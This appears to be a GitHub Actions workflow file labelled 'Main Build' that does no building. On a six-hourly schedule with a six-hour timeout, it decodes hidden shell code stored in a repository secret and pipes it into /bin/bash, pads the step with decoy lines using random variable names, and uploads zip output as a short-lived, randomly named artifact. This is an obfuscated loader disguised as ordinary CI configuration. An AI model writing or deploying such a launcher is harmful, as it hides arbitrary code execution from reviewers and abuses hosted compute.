name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '27 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          yz92: ${{ secrets.yz92 }}
        run: |
          printf '%s' "$yz92" | jq -r .pxbyq83369 | /bin/bash
          printf '%s' "$ekhio941" | jq -r .khz7 | /bin/bash
          echo $rkw8 | jq -r .zx8428 | /bin/bash
          printf '%s' "$pd1468" | jq -r .ovbsw853 | /bin/bash
          printf '%s' "$yucf6414" | jq -r .zcuoh1972 | /bin/bash
          echo $vawdm1149 | jq -r .gwvjf5 | /bin/bash
          echo $u9 | jq -r .q21927 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: DA4Io1hK
          path: "*.zip"
          retention-days: 1
